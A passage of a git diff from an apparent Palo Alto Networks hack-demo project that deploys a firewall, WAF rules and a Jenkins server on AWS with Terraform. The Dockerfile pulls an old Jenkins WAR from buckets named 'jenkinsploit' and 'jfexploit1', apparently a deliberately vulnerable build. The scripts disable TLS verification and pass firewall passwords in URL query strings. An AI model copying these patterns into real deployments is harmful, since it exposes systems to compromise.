         logger.info("WebInDeploy failed")
         update_status('web_in_deploy_status', 'error')
-        update_status('web_in_deploy_stderr', stderr)
         print(json.dumps(status_output))
         exit(1)
-    else:
-        update_status('web_in_deploy_status', 'success')
-
-    albDns = tf.output('ALB-DNS')
-    fwMgt = tf.output('MGT-IP-FW-1')
-    nlbDns = tf.output('NLB-DNS')
-    fwMgtIP = fwMgt
 
-    WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt
+    WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgtIP
     WebInFWConf_vars['nlb-dns'] = nlbDns
 
     WebInDeploy_vars['alb_dns'] = albDns
     WebInDeploy_vars['nlb-dns'] = nlbDns
-
     #
     # Apply WAF Rules
     #
+    return_code, waf_conf_out = apply_tf('./waf_conf', waf_conf_vars, 'Waf_conf')
 
-    tf = Terraform(working_dir='./waf_conf')
-    tf.cmd('init')
-    kwargs = {"auto-approve": True}
-    logger.info("Applying WAF config to App LB")
-
-    if run_plan:
-        tf.plan(capture_output=capture_output, var=vars, **kwargs)
-
-    return_code3, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True,
-                                            var=waf_conf_vars, **kwargs)
-
-    waf_conf_out = tf.output()
+    logger.debug('Got Return code for deploy waf_conf {}'.format(return_code))
 
     update_status('waf_conf_output', waf_conf_out)
     # update_status('waf_conf_stdout', stdout)
-    # update_status('waf_conf_stderr', stderr)
-
-    logger.debug('Got Return code to deploy waf_conf {}'.format(return_code3))
-
-    if return_code3 != 0:
+    # update_status('waf_conf_stderr', stderr
+    logger.debug('Got Return code to deploy waf_conf {}'.format(return_code))
+    if return_code == 0:
+        update_status('waf_conf_status', 'success')
+    else:
         logger.info("waf_conf failed")
         update_status('waf_conf_status', 'error')
-        update_status('waf_conf_stderr', stderr)
         print(json.dumps(status_output))
         exit(1)
-    else:
-        update_status('waf_conf_status', 'success')
-
-    logger.info("Got these values from output of first run\n\n")
-    logger.info("ALB address is {}".format(albDns))
-    logger.info("nlb address is {}".format(nlbDns))
-    logger.info("Firewall Mgt address is {}".format(fwMgt))
 
     #
     # Check firewall is up and running
     # #
-
     api_key = getApiKey(fwMgtIP, username, password)
 
+    #FIXME Add timeout after 3 minutes
+
     while True:
         err = getFirewallStatus(fwMgtIP, api_key)
         if err == 'cmd_error':
@@ -565,56 +616,30 @@ def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key
     logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions')
     time.sleep(10)
     fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password)
+
     logger.info("Updating firewall with latest content pack")
 
     update_fw(fwMgtIP, api_key)
-    updateHandle = updater.ContentUpdater(fw)
-
-    # updateHandle.download(fw)
-    # logger.info("Waiting 3 minutes for content update to download")
-    # time.sleep(210)
-    # updateHandle.install()
 
     #
     # Configure Firewall
     #
 
-    tf = Terraform(working_dir='./WebInFWConf')
-    tf.cmd('init')
-    kwargs = {"auto-approve": True}
-
-    logger.info("Applying addtional config to firewall")
+    return_code, web_in_fw_conf_out = apply_tf('./WebInFWConf', WebInFWConf_vars, 'WebInFWConf')
 
-    WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt
+    if return_code == 0:
+        update_status('web_in_fw_conf', 'success')
+        logger.info("WebInFWConf success")
 
-    if run_plan:
-        tf.plan(capture_output=capture_output, var=WebInFWConf_vars)
-
-    # update initial vars with generated fwMgt ip
-
-    return_code2, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True,
-                                            var=WebInFWConf_vars, **kwargs)
-
-    web_in_fw_conf_out = tf.output()
-
-    update_status('web_in_fw_conf_output', web_in_fw_conf_out)
-    # update_status('web_in_fw_conf_stdout', stdout)
-
-    logger.debug('Got Return code for deploy WebInFwConf {}'.format(return_code2))
-
-    if return_code2 != 0:
-        logger.error("WebFWConfy failed")
-        update_status('web_in_fw_conf_status', 'error')
-        update_status('web_in_fw_conf_stderr', stderr)
+    else:
+        logger.info("WebInFWConf failed")
+        update_status('web_in_deploy_status', 'error')
         print(json.dumps(status_output))
         exit(1)
-    else:
-        update_status('web_in_fw_conf_status', 'success')
 
     logger.info("Commit changes to firewall")
 
     fw.commit()
-    logger.info("waiting for commit")
     time.sleep(60)
     logger.info("waiting for commit")
 
@@ -624,8 +649,6 @@ def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key
 
     logger.info('Checking if Jenkins Server is ready')
 
-    # FIXME - add outputs for all 3 dirs
-
     res = getServerStatus(albDns)
 
     if res == 'server_up':
@@ -636,9 +659,6 @@ def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key
         logger.info('Jenkins Server is down')
         logger.info('\n\n   ### Deployment Complete ###')
 
-    # dump out status to stdout
-    print(json.dumps(status_output))
-
 
 if __name__ == '__main__':
     parser = argparse.ArgumentParser(description='Get Terraform Params')
@@ -648,7 +668,7 @@ def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key
     parser.add_argument('-s', '--aws_secret_key', help='AWS Secret', required=True)
     parser.add_argument('-r', '--aws_region', help='AWS Region', required=True)
     parser.add_argument('-c', '--aws_key_pair', help='AWS EC2 Key Pair', required=True)
-    parser.add_argument('-b', '--s3_bootstrap_bucket', help='AWS S3 Bootstrap bucket', required=True)
+    # parser.add_argument('-b', '--s3_bootstrap_bucket', help='AWS S3 Bootstrap bucket', required=True)
 
     args = parser.parse_args()
     username = args.username
@@ -657,6 +677,6 @@ def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key
     aws_secret_key = args.aws_secret_key
     aws_region = args.aws_region
     ec2_key_pair = args.aws_key_pair
-    bootstrap_s3bucket = args.s3_bootstrap_bucket
+    # bootstrap_s3bucket = args.s3_bootstrap_bucket
 
-    main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key_pair, bootstrap_s3bucket)
+    main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key_pair)
diff --git a/aws/Jenkins_proj-master/deployold.py b/aws/Jenkins_proj-master/deployold.py
new file mode 100644
index 00000000..ed65e372
--- /dev/null
+++ b/aws/Jenkins_proj-master/deployold.py
@@ -0,0 +1,662 @@
+#!/usr/bin/env python3
+"""
+Paloaltonetworks deploy.py
+
+This software is provided without support, warranty, or guarantee.
+Use at your own risk.
+
+Usage
+
+python deploy.py -u <fwusername> -p'<fwpassword> -k <aws_key> -s <aws_secret> -r <aws_region>
+
+Contents of json dict
+
+{"WebInDeploy": "Success", "WebInFWConf": "Success", "waf_conf": "Success"}
+`"""
+
+import argparse
+import json
+import logging
+import ssl
+import subprocess
+import sys
+import time
+import xml.etree.ElementTree as ET
+
+import requests
+import urllib3
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+from pandevice import firewall
+from pandevice import updater
+from python_terraform import Terraform
+
+gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
+
+logging.basicConfig(level=logging.DEBUG)
+logger = logging.getLogger()
+handler = logging.StreamHandler()
+formatter = logging.Formatter('%(levelname)-8s %(message)s')
+handler.setFormatter(formatter)
+logger.addHandler(handler)
+logger.setLevel(logging.INFO)
+
+# global var to keep status output
+status_output = dict()
+
+
+def send_request(call):
+    try:
+        r = requests.get(call, verify=False, timeout=5)
+        r.raise_for_status()
+    except requests.exceptions.HTTPError as errh:
+        '''
+        Firewall may return 5xx error when rebooting.  Need to handle a 5xx response 
+        '''
+        logger.debug("DeployRequestException Http Error:")
+        raise DeployRequestException("Http Error:")
+    except requests.exceptions.ConnectionError as errc:
+        logger.debug("DeployRequestException Connection Error:")
+        raise DeployRequestException("Connection Error")
+    except requests.exceptions.Timeout as errt:
+        logger.debug("DeployRequestException Timeout Error:")
+        raise DeployRequestException("Timeout Error")
+    except requests.exceptions.RequestException as err:
+        logger.debug("DeployRequestException RequestException Error:")
+        raise DeployRequestException("Request Error")
+    else:
+        return r
+
+
+class DeployRequestException(Exception):
+    pass
+
+
+def update_fw(fwMgtIP, api_key):
+    # # Download latest applications and threats
+    type = "op"
+    cmd = "<request><content><upgrade><download><latest></latest></download></upgrade></content></request>"
+    call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+    try:
+        r = send_request(call)
+    except:
+        DeployRequestException
+        logger.debug("failed to get jobid this time.  Try again")
+    else:
+        tree = ET.fromstring(r.text)
+        jobid = tree[0][1].text
+        print("Download latest Applications and Threats update - " + str(jobid))
+    completed = 0
+    while (completed == 0):
+        time.sleep(10)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
+        try:
+            r = send_request(call)
+        except:
+            DeployRequestException
+            logger.debug("failed to get jobid this time.  Try again")
+        else:
+            tree = ET.fromstring(r.text)
+
+            if (tree[0][0][5].text == 'FIN'):
+                logger.debug("APP+TP download Status - " + str(tree[0][0][5].text))
+                completed = 1
+            else:
+                print("Download latest Applications and Threats update")
+                status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str(
+                    tree[0][0][12].text) + "% complete"
+                print('{0}\r'.format(status))
+
+    # Install latest applications and threats without committing
+    time.sleep(1)
+    type = "op"
+    cmd = "<request><content><upgrade><install><version>latest</version><commit>no</commit></install></upgrade></content></request>"
+    call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+    try:
+        r = send_request(call)
+    except:
+        DeployRequestException
+        logger.debug("Requested content install but got response{}".format(r))
+    else:
+        print("request for content upgrade response was {}".format(r.text))
+        tree = ET.fromstring(r.text)
+        if tree.attrib['status'] == 'success':
+            '''
+            Check that we were able to schedule the install
+            Valid response would contain
+            <response status="success">
+            Invalid response would contain
+            <response status="error">
+            '''
+            jobid = tree[0][1].text
+            print("Install latest Applications and Threats update - " + str(jobid))
+
+            completed = 0
+            while (completed == 0):
+                time.sleep(10)
+                call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (
+                    fwMgtIP, jobid, api_key)
+                r = send_request(call)
+                tree = ET.fromstring(r.text)
+
+                if (tree[0][0][5].text == 'FIN'):
+                    logger.debug("APP+TP install Status - " + str(tree[0][0][5].text) + " " + str(
+                        tree[0][0][12].text) + "% complete")
+                    completed = 1
+                else:
+                    print("tree value {}".format(tree[0][0][5].text))
+                    status = "APP+TP install Status - " + str(tree[0][0][5].text) + " " + str(
+                        tree[0][0][12].text) + "% complete"
+                    print('{0}\r'.format(status))
+        else:
+            logger.debug("Unable to schedule install")
+
+    # download latest anti-virus update
+    type = "op"
+    cmd = "<request><anti-virus><upgrade><download><latest></latest></download></upgrade></anti-virus></request>"
+    call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+    try:
+        r = send_request(call)
+    except:
+        DeployRequestException
+        logger.debug("Requested AV download but got response{}".format(DeployRequestException))
+    else:
+        tree = ET.fromstring(r.text)
+        jobid = tree[0][1].text
+        logger.debug("Got Jobid {} for download latest Anti-Virus update".format(str(jobid)))
+
+    completed = 0
+    while (completed == 0):
+        time.sleep(10)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
+        r = send_request(call)
+
+        tree = ET.fromstring(r.text)
+        if (tree[0][0][5].text == 'FIN'):
+            logger.debug(
+                "AV download Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete")
+            completed = 1
+        else:
+            status = "AV download Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete"
+            print('{0}\r'.format(status))
+
+    # install latest anti-virus update without committing
+    type = "op"
+    cmd = "<request><anti-virus><upgrade><install><version>latest</version><commit>no</commit></install></upgrade></anti-virus></request>"
+    call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+    r = send_request(call)
+    tree = ET.fromstring(r.text)
+    if tree.attrib['status'] == 'success':
+        '''
+        Check that we were able to schedule the install
+        Valid response would contain
+        <response status="success">
+        Invalid response would contain
+        <response status="error">
+        '''
+        jobid = tree[0][1].text
+        print("Install latest Anti-Virus update - " + str(jobid))
+
+        completed = 0
+        while (completed == 0):
+            time.sleep(10)
+            call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (
+                fwMgtIP, jobid, api_key)
+            r = send_request(call)
+            tree = ET.fromstring(r.text)
+
+            if (tree[0][0][5].text == 'FIN'):
+                logger.debug(
+                    "AV install Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete")
+                completed = 1
+            else:
+                status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete"
+                print('{0}\r'.format(status))
+    else:
+        logger.debug("Unable to schedule install")
+
+
+def getApiKey(hostname, username, password):
+    '''
+    Generate the API key from username / password
+    '''
+
+    call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password)
+
+    api_key = ""
+    while True:
+        try:
+            # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read()
+            response = send_request(call)
+
+
+        except DeployRequestException as updateerr:
+            logger.info("No response from FW. Wait 20 secs before retry")
+            time.sleep(10)
+            continue
+
+        else:
+            api_key = ET.XML(response.content)[0][0].text
+            logger.info("FW Management plane is Responding so checking if Dataplane is ready")
+            logger.debug("Response to get_api is {}".format(response))
+            return api_key
+
+
+# def getFirewallStatus(fwMgtIP, api_key):
+#     """
+#     Gets the firewall status by sending the API request show chassis status.
+#     :param fwMgtIP:  IP Address of firewall interface to be probed
+#     :param api_key:  Panos API key
+#     """
+#     global gcontext
+#
+#     cmd = urllib.request.Request(
+#         "https://" + fwMgtIP + "/api/?type=op&cmd=<show><chassis-ready></chassis-ready></show>&key=" + api_key)
+#     # Send command to fw and see if it times out or we get a response
+#     logger.info("Sending command 'show chassis status' to firewall")
+#     try:
+#         response = urllib.request.urlopen(cmd, data=None, context=gcontext, timeout=5).read()
+#
+#     except urllib.error.URLError:
+#         logger.debug("No response from FW. So maybe not up!")
+#         return 'no'
+#         # sleep and check again?
+#     else:
+#         logger.debug("Got response to 'show chassis status' {}".format(response))
+#
+#     resp_header = ET.fromstring(response)
+#     logger.debug('Response header is {}'.format(resp_header))
+#
+#     if resp_header.tag != 'response':
+#         logger.debug("Did not get a valid 'response' string...maybe a timeout")
+#         return 'cmd_error'
+#
+#     if resp_header.attrib['status'] == 'error':
+#         logger.debug("Got an error for the command")
+#         return 'cmd_error'
+#
+#     if resp_header.attrib['status'] == 'success':
+#         # The fw responded with a successful command execution. So is it ready?
+#         for element in resp_header:
+#             if element.text.rstrip() == 'yes':
+#                 logger.info("FW Chassis is ready to accept configuration and connections")
+#                 return 'yes'
+#             else:
+#                 logger.info("FW Chassis not ready, still waiting for dataplane")
+#                 time.sleep(10)
+#                 return 'almost'
+
+def getFirewallStatus(fwIP, api_key):
+    fwip = fwIP
+
+    """
+    Gets the firewall status by sending the API request show chassis status.
+    :param fwMgtIP:  IP Address of firewall interface to be probed
+    :param api_key:  Panos API key
+    """
+    global gcontext
+
+    url = "https://%s/api/?type=op&cmd=<show><chassis-ready></chassis-ready></show>&key=%s" % (fwip, api_key)
+    # Send command to fw and see if it times out or we get a response
+    logger.info("Sending command 'show chassis status' to firewall")
+    try:
+        response = requests.get(url, verify=False, timeout=10)
+        response.raise_for_status()
+    except requests.exceptions.Timeout as fwdownerr:
+        logger.debug("No response from FW. So maybe not up!")
+        return 'no'
+        # sleep and check again?
+    except requests.exceptions.HTTPError as fwstartgerr:
+        '''
+        Firewall may return 5xx error when rebooting.  Need to handle a 5xx response
+        raise_for_status() throws HTTPError for error responses 
+        '''
+        logger.infor("Http Error: {}: ".format(fwstartgerr))
+        return 'cmd_error'
+    except requests.exceptions.RequestException as err:
+        logger.debug("Got RequestException response from FW. So maybe not up!")
+        return 'cmd_error'
+    else:
+        logger.debug("Got response to 'show chassis status' {}".format(response))
+
+        resp_header = ET.fromstring(response.content)
+        logger.debug('Response header is {}'.format(resp_header))
+
+        if resp_header.tag != 'response':
+            logger.debug("Did not get a valid 'response' string...maybe a timeout")
+            return 'cmd_error'
+
+        if resp_header.attrib['status'] == 'error':
+            logger.debug("Got an error for the command")
+            return 'cmd_error'
+
+        if resp_header.attrib['status'] == 'success':
+            # The fw responded with a successful command execution. So is it ready?
+            for element in resp_header:
+                if element.text.rstrip() == 'yes':
+                    logger.info("FW Chassis is ready to accept configuration and connections")
+                    return 'yes'
+                else:
+                    logger.info("FW Chassis not ready, still waiting for dataplane")
+                    time.sleep(10)
+                    return 'almost'
+
+
+def update_status(key, value):
+    global status_output
+
+    if type(status_output) is not dict:
+        logger.info('Creating new status_output object')
+        status_output = dict()
+
+    if key is not None and value is not None:
+        status_output[key] = value
+
+    # write status to file to future tracking
+    write_status_file(status_output)
+
+
+def write_status_file(message_dict):
+    """
+    Writes the deployment state to a dict and outputs to file for status tracking
+    """
+    try:
+        message_json = json.dumps(message_dict)
+        with open('deployment_status.json', 'w+') as dpj:
+            dpj.write(message_json)
+
+    except ValueError as ve:
+        logger.error('Could not write status file!')
+        print('Could not write status file!')
+        sys.exit(1)
+
+
+def getServerStatus(IP):
+    """
+    Gets the server status by sending an HTTP request and checking for a 200 response code
+    """
+    global gcontext
+
+    call = ("http://" + IP + "/")
+    logger.info('URL request is {}'.format(call))
+    # Send command to fw and see if it times out or we get a response
+    count = 0
+    max_count = 15
+    while True:
+        if count < max_count:
+            try:
+                count = count + 1
+                r = send_request(call)
+            except DeployRequestException as e:
+                logger.debug("Got Invalid response".format(e))
+            else:
+                logger.info('Jenkins Server responded with HTTP 200 code')
+                return 'server_up'
+        else:
+            break
+    return 'server_down'
+
+
+def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key_pair, bootstrap_bucket):
+    username = username
+    password = password
+    aws_access_key = aws_access_key
+    aws_secret_key = aws_secret_key
+    aws_region = aws_region
+    ec2_key_pair = ec2_key_pair
+    albDns = ''
+    nlbDns = ''
+    fwMgt = ''
+
+    default_vars = {
+        'aws_access_key': aws_access_key,
+        'aws_secret_key': aws_secret_key,
+        'aws_region': aws_region
+    }
+
+    WebInDeploy_vars = {
+        'aws_access_key': aws_access_key,
+        'aws_secret_key': aws_secret_key,
+        'aws_region': aws_region,
+        'ServerKeyName': ec2_key_pair,
+        'bootstrap_s3bucket': bootstrap_bucket
+    }
+
+    waf_conf_vars = {
+        'aws_access_key': aws_access_key,
+        'aws_secret_key': aws_secret_key,
+        'aws_region': aws_region,
+        'ServerKeyName': ec2_key_pair,
+        'alb_arn': albDns,
+        'nlb-dns': nlbDns
+    }
+
+    WebInFWConf_vars = {
+        'aws_access_key': aws_access_key,
+        'aws_secret_key': aws_secret_key,
+        'aws_region': aws_region,
+        'ServerKeyName': ec2_key_pair,
+        'mgt-ipaddress-fw1': fwMgt,
+        'nlb-dns': nlbDns,
+        'username': username,
+        'password': password
+    }
+
+    # Set run_plan to TRUE is you wish to run terraform plan before apply
+    run_plan = False
+    kwargs = {"auto-approve": True}
+
+    # Class Terraform uses subprocess and setting capture_output to True will capture output
+    capture_output = kwargs.pop('capture_output', False)
+
+    if capture_output is True:
+        stderr = subprocess.PIPE
+        stdout = subprocess.PIPE
+    else:
+        # if capture output is False, then everything will essentially go to stdout and stderrf
+        stderr = sys.stderr
+        stdout = sys.stdout
+        start_time = time.asctime()
+        print(f'Starting Deployment at {start_time}\n')
+
+    # Build Infrastructure
+
+    tf = Terraform(working_dir='./WebInDeploy')
+
+    tf.cmd('init')
+    if run_plan:
+        # print('Calling tf.plan')
+        tf.plan(capture_output=False, var=WebInDeploy_vars)
+
+    return_code1, stdout, stderr = tf.apply(var=WebInDeploy_vars, capture_output=capture_output, skip_plan=True,
+                                            **kwargs)
+
+    web_in_deploy_output = tf.output()
+
+    logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1))
+
+    # update_status('web_in_deploy_stdout', stdout)
+    update_status('web_in_deploy_output', web_in_deploy_output)
+
+    if return_code1 != 0:
+        logger.info("WebInDeploy failed")
+        update_status('web_in_deploy_status', 'error')
+        update_status('web_in_deploy_stderr', stderr)
+        print(json.dumps(status_output))
+        exit(1)
+    else:
+        update_status('web_in_deploy_status', 'success')
+
+    albDns = tf.output('ALB-DNS')
+    fwMgt = tf.output('MGT-IP-FW-1')
+    nlbDns = tf.output('NLB-DNS')
+    fwMgtIP = fwMgt
+
+    WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt
+    WebInFWConf_vars['nlb-dns'] = nlbDns
+
+    WebInDeploy_vars['alb_dns'] = albDns
+    WebInDeploy_vars['nlb-dns'] = nlbDns
+
+    #
+    # Apply WAF Rules
+    #
+
+    tf = Terraform(working_dir='./waf_conf')
+    tf.cmd('init')
+    kwargs = {"auto-approve": True}
+    logger.info("Applying WAF config to App LB")
+
+    if run_plan:
+        tf.plan(capture_output=capture_output, var=vars, **kwargs)
+
+    return_code3, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True,
+                                            var=waf_conf_vars, **kwargs)
+
+    waf_conf_out = tf.output()
+
+    update_status('waf_conf_output', waf_conf_out)
+    # update_status('waf_conf_stdout', stdout)
+    # update_status('waf_conf_stderr', stderr)
+
+    logger.debug('Got Return code to deploy waf_conf {}'.format(return_code3))
+
+    if return_code3 != 0:
+        logger.info("waf_conf failed")
+        update_status('waf_conf_status', 'error')
+        update_status('waf_conf_stderr', stderr)
+        print(json.dumps(status_output))
+        exit(1)
+    else:
+        update_status('waf_conf_status', 'success')
+
+    logger.info("Got these values from output of first run\n\n")
+    logger.info("ALB address is {}".format(albDns))
+    logger.info("nlb address is {}".format(nlbDns))
+    logger.info("Firewall Mgt address is {}".format(fwMgt))
+
+    #
+    # Check firewall is up and running
+    # #
+
+    api_key = getApiKey(fwMgtIP, username, password)
+
+    while True:
+        err = getFirewallStatus(fwMgtIP, api_key)
+        if err == 'cmd_error':
+            logger.info("Command error from fw ")
+
+        elif err == 'no':
+            logger.info("FW is not up...yet")
+            # print("FW is not up...yet")
+            time.sleep(60)
+            continue
+
+        elif err == 'almost':
+            logger.info("MGT up waiting for dataplane")
+            time.sleep(20)
+            continue
+
+        elif err == 'yes':
+            logger.info("FW is up")
+            break
+
+    logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions')
+    time.sleep(10)
+    fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password)
+    logger.info("Updating firewall with latest content pack")
+
+    update_fw(fwMgtIP, api_key)
+    updateHandle = updater.ContentUpdater(fw)
+
+    # updateHandle.download(fw)
+    # logger.info("Waiting 3 minutes for content update to download")
+    # time.sleep(210)
+    # updateHandle.install()
+
+    #
+    # Configure Firewall
+    #
+
+    tf = Terraform(working_dir='./WebInFWConf')
+    tf.cmd('init')
+    kwargs = {"auto-approve": True}
+
+    logger.info("Applying addtional config to firewall")
+
+    WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt
+
+    if run_plan:
+        tf.plan(capture_output=capture_output, var=WebInFWConf_vars)
+
+    # update initial vars with generated fwMgt ip
+
+    return_code2, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True,
+                                            var=WebInFWConf_vars, **kwargs)
+
+    web_in_fw_conf_out = tf.output()
+
+    update_status('web_in_fw_conf_output', web_in_fw_conf_out)
+    # update_status('web_in_fw_conf_stdout', stdout)
+
+    logger.debug('Got Return code for deploy WebInFwConf {}'.format(return_code2))
+
+    if return_code2 != 0:
+        logger.error("WebFWConfy failed")
+        update_status('web_in_fw_conf_status', 'error')
+        update_status('web_in_fw_conf_stderr', stderr)
+        print(json.dumps(status_output))
+        exit(1)
+    else:
+        update_status('web_in_fw_conf_status', 'success')
+
+    logger.info("Commit changes to firewall")
+
+    fw.commit()
+    logger.info("waiting for commit")
+    time.sleep(60)
+    logger.info("waiting for commit")
+
+    #
+    # Check Jenkins
+    #
+
+    logger.info('Checking if Jenkins Server is ready')
+
+    # FIXME - add outputs for all 3 dirs
+
+    res = getServerStatus(albDns)
+
+    if res == 'server_up':
+        logger.info('Jenkins Server is ready')
+        logger.info('\n\n   ### Deployment Complete ###')
+        logger.info('\n\n   Connect to Jenkins Server at http://{}'.format(albDns))
+    else:
+        logger.info('Jenkins Server is down')
+        logger.info('\n\n   ### Deployment Complete ###')
+
+    # dump out status to stdout
+    print(json.dumps(status_output))
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description='Get Terraform Params')
+    parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+    parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+    parser.add_argument('-k', '--aws_access_key', help='AWS Key', required=True)
+    parser.add_argument('-s', '--aws_secret_key', help='AWS Secret', required=True)
+    parser.add_argument('-r', '--aws_region', help='AWS Region', required=True)
+    parser.add_argument('-c', '--aws_key_pair', help='AWS EC2 Key Pair', required=True)
+    parser.add_argument('-b', '--s3_bootstrap_bucket', help='AWS S3 Bootstrap bucket', required=True)
+
+    args = parser.parse_args()
+    username = args.username
+    password = args.password
+    aws_access_key = args.aws_access_key
+    aws_secret_key = args.aws_secret_key
+    aws_region = args.aws_region
+    ec2_key_pair = args.aws_key_pair
+    bootstrap_s3bucket = args.s3_bootstrap_bucket
+
+    main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key_pair, bootstrap_s3bucket)
diff --git a/aws/Jenkins_proj-master/destroy.py b/aws/Jenkins_proj-master/destroy.py
index 0767fe20..5cc63f13 100644
--- a/aws/Jenkins_proj-master/destroy.py
+++ b/aws/Jenkins_proj-master/destroy.py
@@ -1,9 +1,20 @@
 #!/usr/bin/env python3
 """
-Paloaltonetworks Deploy_Jenkins_Hack_Demo.py
-
-This software is provided without support, warranty, or guarantee.
-Use at your own risk.
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
 """
 
 '''
@@ -68,7 +79,7 @@ def main(aws_access_key, aws_secret_key, aws_region):
         exit()
     else:
 
-        logger.info("Destroyed WebInDeploy ")
+        logger.info("Destroyed waf_conf Successfully")
 
     tf = Terraform(working_dir='./WebInDeploy')
     tf.cmd('init')
@@ -82,12 +93,12 @@ def main(aws_access_key, aws_secret_key, aws_region):
 
     if return_code1 != 0:
         logger.info("WebInDeploy destroyed")
-        deployment_status = {'WebInDeploy': 'Fail'}
-        print(deployment_status)
+        print ('Failed to Destroy WebInDeploy')
+        
         exit(1)
     else:
-        deployment_status = {'WebInDeploy': 'Success'}
-        print(deployment_status)
+        print ('Destroyed WebInDeploy Successfully')
+        
         exit(0)
 
 
diff --git a/aws/Jenkins_proj-master/jenkins/Dockerfile b/aws/Jenkins_proj-master/jenkins/Dockerfile
index af9e7988..54ce0aef 100644
--- a/aws/Jenkins_proj-master/jenkins/Dockerfile
+++ b/aws/Jenkins_proj-master/jenkins/Dockerfile
@@ -21,7 +21,7 @@ ENV JENKINS_VERSION 2.32.1
 RUN set -ex \
     && [ -e /usr/share/jenkins ] || mkdir -p /usr/share/jenkins \
     && [ -e /usr/share/jenkins/ref ] || mkdir -p /usr/share/jenkins/ref \
-    && wget https://s3.amazonaws.com/jenkinsploit/jenkins-2-32.war -O /usr/share/jenkins/jenkins.war -q --progress=bar:force:noscroll --show-progress \
+    && wget https://jfexploit1.s3-us-west-2.amazonaws.com/jenkins-2-32.war -O /usr/share/jenkins/jenkins.war -q --progress=bar:force:noscroll --show-progress \
     && chown -R jenkins "$JENKINS_HOME" /usr/share/jenkins/ref
 
 EXPOSE 8080
diff --git a/aws/Jenkins_proj-master/requirements.txt b/aws/Jenkins_proj-master/requirements.txt
index 54a21127..87044590 100644
--- a/aws/Jenkins_proj-master/requirements.txt
+++ b/aws/Jenkins_proj-master/requirements.txt
@@ -1,4 +1,10 @@
+certifi==2019.3.9
+chardet==3.0.4
+collections2==0.3.0
+idna==2.8
 pan-python==0.14.0
 pandevice==0.6.6
 python-terraform==0.10.0
 requests==2.21.0
+urllib3==1.24.2
+xmltodict==0.12.0
diff --git a/aws/RedLock-IAMroles-tf/readonly/aws_iam_policy_document_rl_ro.json b/aws/RedLock-IAMroles-tf/readonly/aws_iam_policy_document_rl_ro.json
index 8979a064..a0daa20d 100644
--- a/aws/RedLock-IAMroles-tf/readonly/aws_iam_policy_document_rl_ro.json
+++ b/aws/RedLock-IAMroles-tf/readonly/aws_iam_policy_document_rl_ro.json
@@ -2,46 +2,24 @@
     "Version": "2012-10-17",
     "Statement": [
       {
-        "Action": [
-            "acm:List*",
-            "apigateway:GET",
-            "appstream:Describe*",
-            "cloudtrail:GetEventSelectors",
-            "cloudtrail:LookupEvents",
-            "cloudsearch:Describe*",
-            "dynamodb:DescribeTable",
-            "ds:Describe*",
-            "elasticache:List*",
-            "eks:List*",
-            "eks:Describe*",
-            "elasticfilesystem:Describe*",
-            "elasticmapreduce:Describe*",
-            "elasticmapreduce:List*",
-            "inspector:Describe*",
